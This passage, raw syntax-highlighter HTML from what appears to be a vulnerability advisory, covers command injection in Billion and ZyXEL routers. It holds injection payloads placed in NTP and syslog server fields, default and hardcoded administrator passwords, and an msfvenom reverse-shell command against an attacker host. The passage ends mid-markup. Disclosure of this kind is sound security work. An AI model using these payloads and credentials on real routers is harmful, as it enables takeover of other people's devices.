class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-4\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SESSIONID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7c082c75<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-5\"><span class=\"crayon-v\">Content<\/span><span 
class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-7\"><span class=\"crayon-v\">SaveTime<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiCurrentTime2<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiCurrentTime1<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">ToolsTimeSetFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiRadioValue<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiClearPCSyncFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiwPCdateMonth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-8\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiwPCdateDay<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateYear<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateHour<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateMinute<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiwPCdateSec<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiCurTime<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N<\/span><span 
class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FA<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">28NTP<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">server<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">connecting<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">29<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-9\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiTimezoneType<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiViewSyncWith<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiPCdateMonth<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiPCdateDay<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiPCdateYear<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiPCdateHour<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiPCdateMinute<\/span><span class=\"crayon-o\">=<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb825265629131071-10\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiPCdateSec<\/span><span class=\"crayon-o\">=&amp;<\/span><span class=\"crayon-v\">uiViewdateToolsTZ<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">GMT<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2B07<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3A00<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiViewdateDS<\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-v\">Disable<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">uiViewSNTPServer<\/span><span class=\"crayon-o\">=<\/span>&#8220;<span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3b<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">c<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb825265629131071-11\"><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ntp2ServerFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FA<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">ntp3ServerFlag<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">N<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">2FA<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0030 seconds] -->  <\/p>\n<p>This request will write the text, which is the command you want it to execute, to a file named <em>\/etc\/ntp.sh<\/em>:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825268688237577\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px 
!important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/userfs\/bin\/ntpclient -s -c 3 -l -h &#8220;&#8221;; ping -c 20 127.0.0.1 &amp;#&#8221; &amp;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825268688237577-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; 
-webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825268688237577-1\"><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">userfs<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">ntpclient<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">l<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">h<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-p\">#&#8221; &amp;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>Which is then executed.<\/p>\n<p><strong>Default accounts &#8211; Billion 5200W-T router<\/strong><\/p>\n<ol>\n<li>username: admin; password: password<\/li>\n<li>username: true; password: true<\/li>\n<li>username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678<\/li>\n<\/ol>\n<p><strong>Unauthenticated command execution vulnerability &#8211; P660HN-T v2<\/strong><br \/> The remote command 
vulnerability is composed of an authenticated command injection and a hardcoded supervisor password. The command injection vulnerability is in the <em>logSet.asp<\/em> file, and the hardcoded supervisor account is username: supervisor; password: zyad1234.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82526a448123773\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" 
readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/pages\/maintenance\/logSetting\/logSet.asp HTTP\/1.1  Content-Length: &#8230;    logSetting_H=1&amp;active=1&amp;logMode=LocalAndRemote&amp;serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&amp;serverPort=514<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526a448123773-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb82526a448123773-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526a448123773-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb82526a448123773-4\">4<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82526a448123773-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">pages<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">maintenance<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">logSetting<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">logSet<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">asp <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb82526a448123773-2\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb82526a448123773-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb82526a448123773-4\"><span class=\"crayon-v\">logSetting_H<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">active<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">logMode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">LocalAndRemote<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">serverIP<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-v\">ping<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">26<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">23<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">serverPort<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">514<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>This will be written to the <em>\/etc\/syslog.conf<\/em> file as:<\/p>\n<\/p>\n<p><!-- Crayon Syntax 
Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82526d797678401\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ServerIP=&#8221;192.168.1.1 `ping -c 3 1.1.1.1`&amp;#&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr 
class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526d797678401-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82526d797678401-1\"><span class=\"crayon-v\">ServerIP<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;192.168.1.1 `ping -c 3 1.1.1.1`&amp;#&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0005 seconds] -->  <\/p>\n<p>Which will then be executed by the syslog background process.<\/p>\n<p>The injection parameter is the <em>ServerIP<\/em>:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb82526f010375674\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> ServerIP=1.1.1.1`&lt;command \/&gt;`&amp;#<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb82526f010375674-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb82526f010375674-1\"><span class=\"crayon-v\">ServerIP<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">1.1.1.1<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-p\">#<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- 
[Format Time: 0.0007 seconds] -->  <\/p>\n<p>The actual command that can be injected has a length limitation of 28 characters.<\/p>\n<p><u>Proof of Concept<\/u><br \/> To perform the attack, the following MSF command line should be used:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825271431242067\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly 
style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> msfvenom -p linux\/mipsbe\/shell_reverse_tcp -f elf -o \/tmp\/shell-be.bin lhost=192.168.1.35 lport=4444<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb825271431242067-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb825271431242067-1\"><span class=\"crayon-v\">msfvenom<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">linux<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">mipsbe<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell_reverse_tcp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">f<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">elf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">o<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">shell<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">be<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bin <\/span><span class=\"crayon-v\">lhost<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">192.168.1.35<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lport<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">4444<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0015 seconds] -->  <\/p>\n<p>Which will serve the <em>\/tmp<\/em> directory through the <em>tftp<\/em> service.<\/p>\n<p>Authenticate to the interface with <em>supervisor:zyad1234<\/em>.<\/p>\n<p>Write the following file <em>\/tmp\/a<\/em> by doing several injections (the injection accepts only 10 and 13 characters at a time).<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb825274102328914\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div 
